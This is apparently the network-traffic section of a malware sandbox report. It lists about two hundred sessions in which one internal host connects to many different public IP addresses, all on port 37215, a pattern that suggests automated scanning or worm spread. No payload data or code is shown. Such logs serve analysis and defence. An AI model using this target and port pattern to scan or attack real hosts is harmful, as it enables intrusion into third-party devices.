                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4128192.168.2.134549041.84.93.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4129192.168.2.1341118197.66.123.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4130192.168.2.1353232157.143.239.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4131192.168.2.134843641.21.19.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4132192.168.2.134133841.118.177.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4133192.168.2.1354894157.155.255.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4134192.168.2.135241641.26.103.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4135192.168.2.133427041.161.87.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4136192.168.2.134204841.77.224.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4137192.168.2.1353406211.56.32.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4138192.168.2.1333182157.61.252.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4139192.168.2.1333154197.38.165.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4140192.168.2.133913441.48.128.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4141192.168.2.1346360190.227.43.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4142192.168.2.1340458157.102.176.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4143192.168.2.13410181.167.24.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4144192.168.2.1342588197.158.220.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4145192.168.2.133498841.167.56.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4146192.168.2.133347441.60.13.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4147192.168.2.134836041.76.181.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4148192.168.2.1359650197.198.165.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4149192.168.2.1357680197.63.141.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4150192.168.2.1342078197.154.84.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4151192.168.2.1349408154.205.32.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4152192.168.2.134637665.180.139.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4153192.168.2.134423441.228.54.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4154192.168.2.133932034.224.96.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4155192.168.2.1356772197.209.118.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4156192.168.2.134890641.133.241.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4157192.168.2.1356008157.50.179.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4158192.168.2.133922641.212.86.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4159192.168.2.1336702141.172.170.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4160192.168.2.13440968.69.142.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4161192.168.2.1337552157.101.128.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4162192.168.2.133975841.29.4.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4163192.168.2.1340782168.36.154.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4164192.168.2.1335166157.137.221.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4165192.168.2.135866641.95.200.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4166192.168.2.134573241.34.199.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4167192.168.2.1340706197.136.235.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4168192.168.2.1343600157.87.93.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4169192.168.2.1341354134.78.95.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4170192.168.2.1350624157.19.117.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4171192.168.2.134978041.199.244.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4172192.168.2.1339744157.212.43.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4173192.168.2.1352660157.57.89.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4174192.168.2.134031041.184.83.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4175192.168.2.133448441.216.197.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4176192.168.2.1333354189.212.38.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4177192.168.2.135842241.111.169.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4178192.168.2.1357672155.199.138.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4179192.168.2.135344241.40.234.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4180192.168.2.135175841.22.19.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4181192.168.2.1335072157.89.136.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4182192.168.2.1342702157.78.95.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4183192.168.2.1346318157.122.106.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4184192.168.2.134112464.32.244.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4185192.168.2.1349128157.28.212.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4186192.168.2.1360204163.171.226.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4187192.168.2.1336516157.131.187.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4188192.168.2.1337044181.239.46.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4189192.168.2.133481413.124.213.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4190192.168.2.1358614197.52.212.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4191192.168.2.1344750189.121.215.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192192.168.2.1355350197.58.77.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4193192.168.2.135511641.201.143.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4194192.168.2.134942041.131.46.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4195192.168.2.1347174197.50.197.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4196192.168.2.1356546197.224.196.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4197192.168.2.1350708122.255.26.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4198192.168.2.1333300201.100.190.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4199192.168.2.1344102157.82.121.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4200192.168.2.135636841.54.43.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4201192.168.2.1348860207.245.84.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4202192.168.2.1336338157.89.67.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4203192.168.2.1347424154.178.68.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4204192.168.2.1334036197.58.31.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4205192.168.2.13474329.191.20.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4206192.168.2.1344850198.251.121.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4207192.168.2.1344852174.55.189.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4208192.168.2.134654441.164.215.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4209192.168.2.1349464197.254.161.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4210192.168.2.134548441.104.192.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4211192.168.2.134255641.9.118.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4212192.168.2.1336988157.157.44.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4213192.168.2.1360238157.49.217.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4214192.168.2.1339150197.203.158.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4215192.168.2.133890666.68.96.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4216192.168.2.1354056197.26.190.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4217192.168.2.1349310190.136.231.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4218192.168.2.1341166110.207.88.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4219192.168.2.135696241.85.96.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4220192.168.2.134191841.0.187.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4221192.168.2.135696241.163.204.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4222192.168.2.1339296197.39.228.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4223192.168.2.1349624157.45.230.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4224192.168.2.1358818173.82.210.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4225192.168.2.133479841.88.42.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4226192.168.2.134356038.125.30.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4227192.168.2.134404641.118.86.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4228192.168.2.1334652197.196.47.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4229192.168.2.135097041.215.166.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4230192.168.2.1355036129.133.17.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4231192.168.2.1350338157.176.128.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4232192.168.2.1355452197.37.250.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4233192.168.2.1336624197.185.127.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4234192.168.2.1343546197.192.14.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4235192.168.2.1356458157.219.107.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4236192.168.2.133603641.185.44.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4237192.168.2.1359790157.174.17.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4238192.168.2.1357172184.153.129.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4239192.168.2.1360464197.149.31.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4240192.168.2.1351290119.212.11.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4241192.168.2.1336466197.95.43.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4242192.168.2.1357744157.252.113.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4243192.168.2.134386041.92.26.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4244192.168.2.1344640197.253.128.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4245192.168.2.134899241.240.16.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4246192.168.2.134765252.84.198.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4247192.168.2.1334290197.51.115.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4248192.168.2.1347766210.77.86.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4249192.168.2.134239036.223.135.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4250192.168.2.1360588197.240.76.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4251192.168.2.1355836205.9.88.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4252192.168.2.1360048197.100.73.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4253192.168.2.1347262197.178.75.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4254192.168.2.135896841.18.3.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4255192.168.2.135314480.43.217.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4256192.168.2.1338534157.39.104.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4257192.168.2.1359600197.212.0.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4258192.168.2.134386041.54.6.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4259192.168.2.135777641.208.163.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4260192.168.2.1334486157.211.21.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4261192.168.2.1359844189.38.96.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4262192.168.2.1345952157.169.243.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4263192.168.2.133629641.110.183.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4264192.168.2.1339400197.224.138.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4265192.168.2.1355310157.23.64.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4266192.168.2.1348714176.172.248.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4267192.168.2.1344020197.106.242.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4268192.168.2.1335072197.31.248.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4269192.168.2.135614641.172.175.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4270192.168.2.134196641.0.164.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4271192.168.2.133899241.255.169.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4272192.168.2.1358074157.129.69.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4273192.168.2.134079441.95.238.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4274192.168.2.1334382157.185.177.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4275192.168.2.135747441.53.40.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4276192.168.2.1334992197.197.156.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4277192.168.2.1342640157.168.3.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4278192.168.2.135298841.144.136.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4279192.168.2.1336022157.116.85.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4280192.168.2.1358042186.209.97.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4281192.168.2.1345786157.77.109.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4282192.168.2.1356160197.156.53.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4283192.168.2.1355196197.97.183.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4284192.168.2.1354566197.217.108.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4285192.168.2.1336698197.58.250.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4286192.168.2.135301841.154.225.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4287192.168.2.1344180157.197.72.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4288192.168.2.133329841.13.222.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4289192.168.2.1341998197.173.108.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4290192.168.2.133636241.196.9.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4291192.168.2.1356224121.61.250.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4292192.168.2.1359654197.111.231.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4293192.168.2.1347330157.242.186.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4294192.168.2.1358194197.204.44.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4295192.168.2.1348832197.158.113.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4296192.168.2.1341166132.46.95.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4297192.168.2.1345688157.23.39.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4298192.168.2.1353104157.129.190.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4299192.168.2.1360150157.68.225.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4300192.168.2.135678041.106.129.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4301192.168.2.135258075.68.57.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4302192.168.2.134891497.97.155.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4303192.168.2.1343592197.1.112.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4304192.168.2.135478687.83.99.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4305192.168.2.1337614185.245.41.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4306192.168.2.1356248157.32.13.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4307192.168.2.13481465.113.44.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4308192.168.2.1353806197.189.104.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4309192.168.2.1343664139.41.200.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4310192.168.2.1338880129.174.230.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4311192.168.2.1345176178.76.16.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4312192.168.2.134823241.104.233.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4313192.168.2.135964641.64.59.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4314192.168.2.133847241.238.6.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4315192.168.2.1333616113.5.198.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4316192.168.2.1344326157.250.11.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4317192.168.2.134394441.92.132.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4318192.168.2.1342256183.68.189.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4319192.168.2.1340490157.244.97.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4320192.168.2.1349604157.191.3.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4321192.168.2.1353188197.126.71.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4322192.168.2.1356188197.169.14.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4323192.168.2.1347332140.201.239.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4324192.168.2.133797441.167.34.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4325192.168.2.1356760171.212.43.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4326192.168.2.1334870157.138.120.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4327192.168.2.1350744197.115.16.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4328192.168.2.134706041.143.156.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4329192.168.2.1354218197.205.87.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4330192.168.2.135898041.201.159.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4331192.168.2.1335906197.10.233.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4332192.168.2.134717462.223.174.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4333192.168.2.134445041.222.102.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4334192.168.2.1354214197.4.166.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4335192.168.2.1338302157.37.69.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4336192.168.2.1343118157.224.234.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
